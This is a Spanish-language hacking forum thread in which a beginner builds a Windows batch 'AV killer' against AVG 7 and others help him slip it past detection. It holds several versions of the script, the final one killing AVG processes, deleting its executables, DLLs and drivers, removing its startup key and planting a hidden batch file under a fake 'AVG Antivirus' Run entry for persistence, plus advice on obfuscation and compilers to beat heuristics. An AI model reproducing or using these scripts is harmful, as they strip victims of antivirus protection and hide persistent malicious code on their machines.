Estoy empezando en batch y escribí el código de un av-killer muy simple :xD
Ahí está:
@echo off
taskkill /f /im avgamsvr.exe
taskkill /f /im avgcc.exe
taskkill /f /im avgemc.exe
taskkill /f /im avgupsvc.exe
cd %programfiles%\Grisoft\AVG7
del *.exe
exit
Bueno, la cosa es que el avg me lo detecta y me niega el acceso al archivo (ni siquiera para editarlo). He probado con un .bat compiler, pero lo que hace es un .exe que crea el .bat en una carpeta temporal y lo ejecuta, con lo que obviamente el avg lo detecta al tiempo de la ejecución.
¿Hay alguna forma de mejorar el código de forma que no lo detecte el avg?
Graciasssss....
Carloswaldo :)
Puedes mirar aca talvez:
http://foro.elhacker.net/scripting/batch_file_creator_generador_de_archivos_binarios_con_batch-t147020.0.html
Podes usar un mejor compilador para tus batch (sugiero el Quick Batch File Compiler, tratá de obtenerlo full versión) o sino borrale estas lines :
cd %programfiles%\Grisoft\AVG7
del *.exe
Que son las que hacen que salte el av (creo)
Espero que te sirva ;)
PD: Usas el AVG ??? :-\ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)
Ese que recomiendas es muy bueno ;) Te lo re-recomiendo :xD
Te recomiendo un par: Sera trio :xD
Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal :P
Un par se utiliza tambien para enlistar varios elementos (2 o más)
Citar
Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal tongue
Lo del cd estaría de más si se borrase la linea del comando del, asi que la incluí para que la borre :rolleyes:
Estaré probando el quick batch compiler
Cita de: ^Arkangel^ en 10 Mayo 2008, 21:59 PM
PD: Usas el AVG ??? :-\ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)
Gracias por las sugerencias pero prefiero el avg por experiencias propias.
Por cierto, si yo mato esos procesos manualmente e intento abrir mi archivo .bat, me sale "Acceso Denegado", lo que sospecho es que algún servicio del avg sigue activo, alguna idea de como saber cuales son todos los procesos que utiliza el avg?
Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.
Un saludo ;)
Cita de: ^Arkangel^ en 11 Mayo 2008, 20:44 PM
Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.
OBVIO, pero como se yo cuales son. :¬¬
Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO :xD
Qué? y eso como se ve?
Por cierto con el Qbc me va de lujo, pero cuando quiero ejecutar el ejecutable a partir del codigo anterior no hace absolutamente nada como gosth aplication, si lo pongo en modo consola me sale en una linea "Acceso Denegado", sin embargo el exe no es detectado por el avg. :-\ Ideas?
trata de cifrar! ;) set va = blablabla...
Cita de: brache en 11 Mayo 2008, 22:15 PM
trata de cifrar! ;) set va = blablabla...
Wiiiiiiiiiiiiiiiiiiiiiiiiii ;D ;D ;D ;D ;D ;D ;D ;D ;D
Avg matado, a por el proximo av ::)
Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?
Cita de: Carloswaldo en 12 Mayo 2008, 03:00 AM
Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?
Mirando en el administrador de Tareas :rolleyes:
Cita de: Carloswaldo
OBVIO, pero como se yo cuales son.
Cita de: Freeze.
Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO
:rolleyes:
Si ya no hay ningún ejecutable porque se borraron todos. :xD
Me he tomado el trabajo de buscar todos y cada uno de los procesos que tenía activos. Unos eran del sistema, otros del vmware, etc, pero nada de nada con respecto al avg... le perdí el rastro :(
Estuve un buen tiempo - ahora que recuerdo - tratando de matar al AVG desde VB y no pude porque no podia desactivar servicios o algo asi :P
Así que podrias comenzar con otro AV más facil o menos dificil ;) Como el panda o el avast ;)
el avast no es malo ^^
te recomiendo el panda antes que el avast ;)
Pero... pero.... debe haber una forma... Y alguien debe de saberla ¿verdad?...
No me rendiré ahora que he llegado "tan" lejos... :xD :xD
Carloswaldo :(
He estado investigando.
Este archivo no lo puedo eliminar ni a bala, osea ni forzandolo en el cmd ni nada:
avgse.dll
Esto es lo que encontre en internet:
CitarDescription: avgse.dll is located in a subfolder of "C:\Program Files" - normally C:\Program Files\Grisoft\AVG Free\. Known file sizes on Windows XP are 40960 bytes (47% of all occurrence), 50688 bytes, 29743 bytes, 45056 bytes, 28207 bytes.
A .dll file (Dynamic Link Library) is a special type of Windows program containing functions that other programs can call. This .dll file can be injected to all running processes and can change or manipulate their behavior. The program is not visible. The service has no detailed description. It can change the behavior of other programs or manipulate other programs. File avgse.dll is not a Windows system file. avgse.dll seems to be a compressed file. Therefore the technical security rating is 64% dangerous, however also read the users reviews.
Quiere decir que esta dll puede estar camuflada en otro proceso? como saberlo?
Ahí está mi codigo:
@echo off
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
exit
Bueno el archivo estaba siendo usado por el explorer, así que se me ocurrió hacer esto:
set h=explorer.exe
set i=avgse.dll
...
taskkill /f /im %h%
del /f /q /s %i%
start %h%
Y lo logra, aunque resulta algo demasiado notorio y sospechozo jaja, hay alguna otra forma de hacerlo?
Ademas aun matando ese archivo el avg sigue activo en alguna parte... ya no se donde buscar...
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"
podrias probarlo asi tmb
saludos
Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302
NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.
Un Saludo :)
Cita de: Darioxhcx en 13 Mayo 2008, 00:23 AM
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"
Con eliminar el archivo no tengo problemas, con el codigo que escribi lo hace. Uso el Quick Batch file compiler y el archivo resultante no es detectado por el av, incluso ejecuto el .bat sin problemas.
Cita de: Hendriҳ en 13 Mayo 2008, 00:28 AM
Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302
NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.
Un Saludo :)
Excelente, no lo había visto, lo estaré probando. Gracias :D
Por cierto, he descubierto que hay ciertos archivos .sys que son del propio avg y estan en el directorio de drivers, sera que estos también me causan problemas?... A este paso terminaré eliminando todo mi disco duro :xD
Pues al parecer por fin lo he logrado, elimnando esos archivos en la carpeta de drivers.
Este es el código final:
::Avg Killer by Carloswaldo
@echo off
::Declaramos variables
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
set h=explorer.exe
set i=avgse.dll
set j=\system32\drivers
set k=avgmfx86.sys
set l=avgclean.sys
set m=avg7rsxp.sys
set n=avg7rsw.sys
set o=avgtdi.sys
set p=avg7core.sys
::Matamos los procesos del avg
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
::Vamos a donde está instalado el avg y borramos los .exe y .dll
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
::Matamos el explorer para matar un dll y un driver, volvemos a iniciar el explorer
taskkill /f /im %h%
del /f /q /s %i%
cd %windir%%j%
del /f /q /s %o%
del /f /q /s %p%
start %h%
::Matamos el resto de drivers
del /f /q /s %k%
del /f /q /s %l%
del /f /q /s %m%
del /f /q /s %n%
::Borramos la clave del registro por si las moscas...
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
::Creamos un bat que se iniciara siempre, solo por si acaso
cd %windir%
echo @echo off >> avg.bat
attrib +r +a +s +h avg.bat
echo set a=avgamsvr.exe >> avg.bat
echo set b=avgcc.exe >> avg.bat
echo set c=avgemc.exe >> avg.bat
echo set d=avgupsvc.exe >> avg.bat
echo set e=\Grisoft\AVG7 >> avg.bat
echo set f=*.exe* >> avg.bat
echo set g=*.dll* >> avg.bat
echo taskkill /f /im %a% >> avg.bat
echo taskkill /f /im %b% >> avg.bat
echo taskkill /f /im %c% >> avg.bat
echo taskkill /f /im %d% >> avg.bat
echo cd %programfiles%%e% >> avg.bat
echo del /f /q /s %f% >> avg.bat
echo del /f /q /s %g% >> avg.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f >> avg.bat
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "AVG Antivirus" /d "%windir%\avg.bat" /f
exit
Hoy que inicie de nuevo el pc ya no me sale por ningun lado el cartelito de "Acceso denegado" ni nada por el estilo. ;D
Estaré buscando la forma de mejorar el código, e iré por el próximo av... ::)
no seria mejor hacer
@echo off
SeT a=attrib
SeT b=-R
SeT c=-A
SeT d=-S
SeT e=Del /F /S /Q
SeT f=*.*
SeT g=cd
SeT i=-H
SeT {=ExiT
SeT 1=%ProgramFiles%\grisoft
%g%%1%
%a%%b%%c%%d%%e%%i%%f%
%e%%f%
%{%
digo yo, o tal vez usar ren *.* *
eso es mas original xD
pero me refiero a borrarlo todo...
$hyDow
bueno si no te quieres complicar la vida poniendo como un becerro:
set var=...............
...................
hay crearon una utilidad para separarlo asi... la postee yo de skull! ;) y no se como es el de hendrix pero si los combinas lo dos y Batch Compiler seria buen aporte! ;)
hombre la aplicacion de hendrix es rebuena, pero tiene mas merito asi
$hyDow